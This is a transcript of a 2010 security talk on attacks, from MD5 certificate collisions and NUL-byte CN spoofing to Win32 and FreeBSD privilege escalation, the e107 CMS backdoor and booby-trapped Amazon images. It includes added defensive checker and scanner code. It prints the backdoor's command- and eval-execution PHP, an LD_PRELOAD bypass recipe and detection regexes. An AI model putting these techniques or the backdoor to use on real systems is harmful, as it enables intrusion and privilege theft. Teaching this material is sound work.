Attacks and Defences

Presentation by Marco Slaviero at the University of Pretoria to the Tuks Linux User Group in 2010.

The aim of this presentation is to promote information security. The presentation begins with a look at a few recent attacks. Cloud computing is briefly discussed. The presentation ends with a discussion on Amazon web services and its security.

Published in Technology
Transcript

  • 1. Attacks and defences Or, really cool hacks
    • [email_address]
  • 2. About Us
    • pta.za company
    • +-20 people
    • Pen-testing for a living
      • VMS
      • training
    • www.sensepost.com
    • [email_address]
  • 3. Why this talk?
    • Explain a little about recent attacks
    • Promote security
    • FLOSS angle? hmmm. FLOSS also insecure?
    • ZaCon (but only at the end, I promise)
  • 4. x509 and MD5
  • 7. x509 attack: MD5
    • Security of system rests in the certificate signature
    • Security of signature lies in the hashing algorithm
      • (Aside: hash function == one-way function that produces fixed-size output. MD5, SHA1, RIPEMD, etc.)
    • If two certificates hash to the same value, then their signatures will be the same
  • 9. x509 attack: MD5
    • Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger
    • Figured out a way to create two colliding certificates
    • Then found CAs issuing certs with MD5, with predictable sequence numbers
  • 10. x509 attack: MD5
    • Attack was:
      • Predict sequence number by purchasing a cert, +1000
      • Predict validity times
      • Create two colliding certificates, one legit and the other evil. The legit cert assumes the predicted sequence number and validity period.
      • Submit CSR for legit cert
      • Holds thumbs on the timing/sequence number
      • Cut and paste the signature onto the evil cert
  • 11. x509 attack: MD5
    • Collision attack performed on a cluster of 200 PS3s
    • Could perform 3 collisions in 72 hours
    • Cost them $600 in purchased certs
    • Earned a valid CA cert
  • 12. x509 and the CN
  • 13. x509 attack: CN
    • Moxie Marlinspike loves SSL
    • He looked into how certs are issued and validated
    • CSRs use ASN.1 to serialise their data
      • Strings are prefixed with their length
    • Most libraries (and by extension browsers) use C string functions to validate certs
      • Strings are terminated by NUL bytes
  • 14. x509 attack: CN
    • CN when evaluated in a CSR
    • CN as seen by a browser
  • 15. x509 attack: CN
    • CAs verify the domain from the end
    • Browsers verify the domain from the front
  • 16. x509 attack: CN
    • No explicit ban on disallowed characters in the CN
    • How about sending a NULL byte in a CSR?
    • www.cs.up.ac.za\0.sensepost.com
    • CA validates from the end, and if we’re the owner of sensepost.com, then we get back a cert
    • When victims receive the malicious cert, their libs validate from the beginning, halting at the NULL
  • 17. Validating the cert
    • Checks performed by the library:
    • Certificate is signed by a trusted CA
    • Validity is fine
    • CN appears to match hostname
    • Great!
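The two certificate weaknesses above (an MD5-based signature, slides 7-11, and a CN whose DER length disagrees with what a NUL-terminated C comparison sees, slides 13-17) can both be caught at the DER level. The following is an added example, not SensePost's code nor any library's: a minimal hand-written DER reader, the md5WithRSAEncryption OID, and constructed sample bytes (not a real certificate) in the shape a Certificate and a PrintableString CN take.

```python
# Added example, not SensePost's or any library's code: a minimal DER reader with checks
# for the two x509 weaknesses in the talk, run over constructed sample bytes.
WEAK_SIG_OIDS = {"1.2.840.113549.1.1.4": "md5WithRSAEncryption"}   # slides 7-11

def tlv(buf, pos=0):
    """Read one DER element at pos: (tag, value bytes, position after the element)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                        # long form: low 7 bits = number of length octets
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(value):
    """OBJECT IDENTIFIER content octets -> dotted notation."""
    arcs, acc = [value[0] // 40, value[0] % 40], 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def signature_algorithm(cert_der):
    """Certificate ::= SEQUENCE { tbsCertificate, signatureAlgorithm, signature }."""
    _, body, _ = tlv(cert_der)
    _, _, after_tbs = tlv(body)                  # skip tbsCertificate
    _, alg_id, _ = tlv(body, after_tbs)          # AlgorithmIdentifier ::= SEQUENCE { OID, params }
    _, oid, _ = tlv(alg_id)
    return decode_oid(oid)

def cn_as_c_string(cn_value):
    """What a NUL-terminated C comparison sees: the bytes before the first NUL (slide 16)."""
    return cn_value.split(b"\x00", 1)[0].decode("latin-1")

def hostname_matches(cn_value, hostname):
    """Hardened match: honour the DER length, reject embedded NULs, compare the whole string."""
    if b"\x00" in cn_value:
        return False
    return cn_value.decode("latin-1").lower() == hostname.lower()

# Constructed samples, not real certificates: a Certificate shell whose AlgorithmIdentifier
# is md5WithRSAEncryption, and the slide's NUL-containing CN as a length-prefixed PrintableString.
_tbs, _sig = b"\x30\x00", b"\x03\x01\x00"
_alg = b"\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00"
SAMPLE_CERT = b"\x30" + bytes([len(_tbs + _alg + _sig)]) + _tbs + _alg + _sig
_cn = b"www.cs.up.ac.za\x00.sensepost.com"
SAMPLE_CN_TLV = b"\x13" + bytes([len(_cn)]) + _cn
```

signature_algorithm(SAMPLE_CERT) returns 1.2.840.113549.1.1.4, which is in WEAK_SIG_OIDS; for the sample CN, cn_as_c_string() shows only www.cs.up.ac.za while hostname_matches() rejects it because the DER-length string contains a NUL.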
  • 18. PKI attacks: cert checking
    • Who was vulnerable?
    • All NSS-based apps
      • Firefox
      • Thunderbird
      • ...
    • IE
    • A bunch of others (Pidgin, AIM, Outlook, Evolution, VPN clients, ...)
  • 19. PKI attacks: cert checking
    • More attacks, including wildcard certs as well as remote buffer overflows
    • thoughtcrime.org
  • 20. Win32 ring3 -> ring0
  • 21. Win32: privilege escalation
    • Tavis Ormandy (Google) found a bug in how ‘iret’ was handled on NetBSD <-- he’s a UNIX guy
    • Poked around on Win32
    • Found a related bug in the 8086 simulator on Win32
    • Great example of a long-standing bug (*)
    • Ridiculous exploit
    • Background...
  • 22. Win32: 8086 simulator
    • Win32 supports execution of real-mode code
    • Simulated environment
    • Simulated app is run by a monitor, which performs necessary sanity checks. Provides fake interrupt handlers.
    • In real-mode, apps get to change segment registers which they can’t in protected mode.
    • Monitor calls into NT kernel when needed, on behalf of the simulated app.
  • 23. Win32: exploit description
    • Spawn ‘cmd.exe’, grab handle
    • Spawn ‘debug.exe’, which inits the NTVDM subsystem including the monitor
    • Inject a DLL into the monitor
    • DLL creates a fake kernel stack
    • Creates a new VDM context
    • Inserts a forged trap frame on the real stack, that points to fake kernel stack
    • Executes code that gens a #GP trap handler on ‘iret’
    • Handler aborts early, forged frame restored. Control passes to attacker supplied code.
    • Code searches for SYSTEM token and assigns it to the initial ‘cmd.exe’
    • Code cleans up completely and returns
    • cmd.exe is now ‘SYSTEM’
  • 24. Win32 demo
  • 25. FreeBSD rtld
  • 26. FreeBSD: rtld
    • dynamic linking
    • environment variables
      • LD_PRELOAD
      • LD_PRELOAD=mylib.so ./myproggie
        • useful for substituting standard library calls, etc.
        • will execute _init() from mylib.so before main()
    • what about suid programs?
      • must remove dangerous environment variables like LD_PRELOAD
  • 27. FreeBSD: rtld code
    /* rtld: drop dangerous variables when running set-uid */
    if (suid) {
        ...
        unsetenv("LD_PRELOAD");
        unsetenv("LD_LIBMAP");
        ...
    }

    /* libc: give up if any environment entry has no '=' */
    int __merge_environ(void) {
        ...
        if (strchr(*env, '=') == NULL) {
            return -1;
        }
        ...
    }

    /* libc: unsetenv() inherits that early abort */
    int unsetenv(const char *name) {
        ...
        if (__merge_environ() == -1) {
            return -1;
        }
        ...
        /* unset env variable here */
    }
  • 28. FreeBSD: rtld
    • So, executing with a corrupted env means the unsetenv() calls abort early, and the linker didn’t check for this
    • One corrupted environment is:
      • { "moomoo", "LD_PRELOAD=mylib.so" }
      • This skips the unsetting of env, but the loader will still load the lib
    • Now for the evilness...
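The bug on slides 27-28 is a missing return-value check, so it is worth seeing both the failure and the fixes side by side. The following is an added example, not FreeBSD's code: a simulation of the quoted unsetenv()/__merge_environ() logic, the loader behaviour the slide describes, and two loader-side fixes. The variable names in DANGEROUS are illustrative.

```python
# Added example, not FreeBSD's code: a simulation of the unsetenv()/__merge_environ()
# logic quoted on slide 27, and two loader-side fixes that do not trust unsetenv() blindly.
DANGEROUS = ("LD_PRELOAD", "LD_LIBMAP", "LD_LIBRARY_PATH")   # names are illustrative

def merge_environ(env):
    """libc: refuse to touch an environment containing an entry without '='."""
    return -1 if any("=" not in entry for entry in env) else 0

def unsetenv(env, name):
    """libc unsetenv(): aborts early with -1 when merge_environ() fails, else removes name."""
    if merge_environ(env) == -1:
        return -1
    env[:] = [e for e in env if e.split("=", 1)[0] != name]
    return 0

def preload_from(env):
    """What the loader would go on to preload, if anything."""
    for e in env:
        if e.startswith("LD_PRELOAD="):
            return e.split("=", 1)[1]
    return None

def rtld_unchecked(env):
    """The slide's loader logic: call unsetenv() for each name and ignore the result."""
    for name in DANGEROUS:
        unsetenv(env, name)
    return env

def rtld_checked(env):
    """Fix 1: fail closed. A failed unsetenv() means 'refuse to run' (returns None)."""
    for name in DANGEROUS:
        if unsetenv(env, name) != 0:
            return None
    return env

def rtld_rebuilt(env):
    """Fix 2: rebuild the environment, keeping only well-formed, non-dangerous entries."""
    return [e for e in env if "=" in e and e.split("=", 1)[0] not in DANGEROUS]

# Constructed input: the corrupted environment from slide 28.
CORRUPTED_ENV = ["moomoo", "LD_PRELOAD=mylib.so"]

if __name__ == "__main__":
    print("unchecked:", preload_from(rtld_unchecked(list(CORRUPTED_ENV))))  # mylib.so
    print("checked  :", rtld_checked(list(CORRUPTED_ENV)))                  # None
    print("rebuilt  :", preload_from(rtld_rebuilt(list(CORRUPTED_ENV))))    # None
```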
  • 29. FreeBSD demo
  • 30. e107 Backdoor
  • 31. e107 Backdoor
    • Example of a real-world attack
    • Popular Open Source CMS
    • Large community / plugins /themes / blah blah
    • A blind SQL injection vuln reported in ver 0.7.15 (Nov 3, 2009)
    • On 25 Jan 2010, a mail appeared on FD
  • 33. e107: backdoor code
    // Gate: a hard-coded MD5 of an attacker-chosen cookie value
    if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb")
    {
        ...
        // run an OS command supplied in the request
        if(!empty($_POST['cmd']))
        {
            $out = execute($_POST['cmd']);
        }
        // or evaluate arbitrary PHP supplied in the request
        elseif(!empty($_POST['php'])){
            ob_start();
            eval($_POST['php']);
            $out = ob_get_contents();
            ob_end_clean();
        }
        ...
    }
  • 34. e107 Backdoor
    • turns out they were owned through the SQLi bug
    • attackers replaced the download link with a link to the backdoored code
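The backdoor on slide 33 has a recognisable shape: a hard-coded MD5 gate on a cookie, then command or PHP execution from request data. The following is an added example, not e107's code: a small scanner that flags that shape in PHP source, run over a constructed sample file containing the slide's snippet. The signature names and the extra PHP function names in the third pattern are my own choices.

```python
# Added example, not e107's code: a small source scanner for the backdoor shape on
# slide 33 (a hard-coded MD5 gate on a cookie, then command or PHP execution from a POST).
import re

SIGNATURES = [
    ("cookie-hash gate",
     re.compile(r"md5\s*\(\s*\$_COOKIE\[[^\]]*\]\s*\)\s*={2,3}\s*['\"][0-9a-f]{32}['\"]", re.I)),
    ("eval of request data",
     re.compile(r"\beval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("command execution of request data",   # 'execute' is the backdoor's own helper name
     re.compile(r"\b(system|exec|shell_exec|passthru|popen|execute)\s*\(\s*\$_(POST|GET|REQUEST)\b", re.I)),
]

def scan_php(source):
    """Return (line_number, signature_name, stripped_line) for every line that matches."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in SIGNATURES:
            if pattern.search(line):
                hits.append((lineno, name, line.strip()))
    return hits

# Constructed sample: the slide's backdoor, condensed, dropped into an otherwise ordinary file.
SAMPLE = """<?php
$pref = get_prefs();
if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb")
{
    if(!empty($_POST['cmd'])) { $out = execute($_POST['cmd']); }
    elseif(!empty($_POST['php'])) { ob_start(); eval($_POST['php']); $out = ob_get_contents(); ob_end_clean(); }
}
echo render($pref);
"""

if __name__ == "__main__":
    for lineno, name, text in scan_php(SAMPLE):
        print(f"line {lineno}: {name}: {text}")
```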
  • 35. Let’s talk cloud computing
    • (it’s hot right now, isn’t it?)
  • 36. So, what exactly *is* the cloud?
  • 39. What drives cloud adoption?
    • Management by in-flight magazine
      • Manager Version
      • Geek Version
    • Poor history from IT
    • Economy is down
      • Cost saving becomes more attractive
      • Cloud computing allows you to move from CAPEX to OPEX
      • (Private Clouds?)
  • 40. Problems with cloud testing
    • Transparency
    • Privacy
    • Compliance
    • Legal
    • Vendor Lock-in
    • Availability
  • 41. BlackHat talk summary
    • Attacked SugarSync, SalesForce, Amazon, MobileMe
    • Not enough time!!!
    • Amazon it is then...
  • 42. Yes, it’s that cool...
  • 43. Amazon EC2
    • Elastic Compute Cloud
    • Provides Xen platform for running virtual machines
    • Easy (Web interface)
    • Auto-scales
    • Cheap
    • Login, pick VM, boot, go!
  • 44. Danger
    • Out of 2700 images, 47 are provided by Amazon
    • Are all secured equally?
    • Tested by scanning each VM with Nessus
      • 1293 Highs
      • 646 Criticals
    • Not good
    • Incompetence aside, what can we ascribe to malice?
  • 45. Can we get someone to run our machine?
    • Bundle an image
    • Register the image (Amazon assigns it an AMI-ID)
    • Wait for someone to run it
    • Profit!
    • Alas... our AMI-ID is too low!
    • Solution:
      • do { /*register stuff */ } while (ami-id > threshold)
  • 46. But there’s more
    • Our race promoted our strangely named image (qscan)
    • Let’s make it sexier
      • fedora - taken
      • fedora_core - taken
      • redhat - taken
      • fedora_core_11 - not taken!
  • 49. What other cloud hacks?
    • SugarSync password reset
    • ClickJacking against SalesForce
    • Porting Nikto into SalesForce
    • License stealing from Amazon
    • Image stealing from Amazon users
    • Found bugs in MobileMe
    • In a position to read Steve Wozniak’s mail :)
    • www.sensepost.com/blog
  • 50. Linux bugs (it’s TLUG)
  • 51. Linux
    • all kernel bugs are DoS
    • not really.
    • Tavis (remember him?) and Julien Tinnes found an exploitable bug in sendpage(), June 2009
    • >2.4.4 and all 2.6 kernels
    • existed since 2001
  • 52. Linux demo
  • 53. Questions? [email_address]
    • As promised:
    • ZaCon -> community sec conference
    • First edition in Nov ’09
    • Papers / vids / list
    • details on the site
    • http://zacon.org.za
    • Attendees / speakers welcome
    • Great venue for 1st-time speakers
    • Look out for announcements.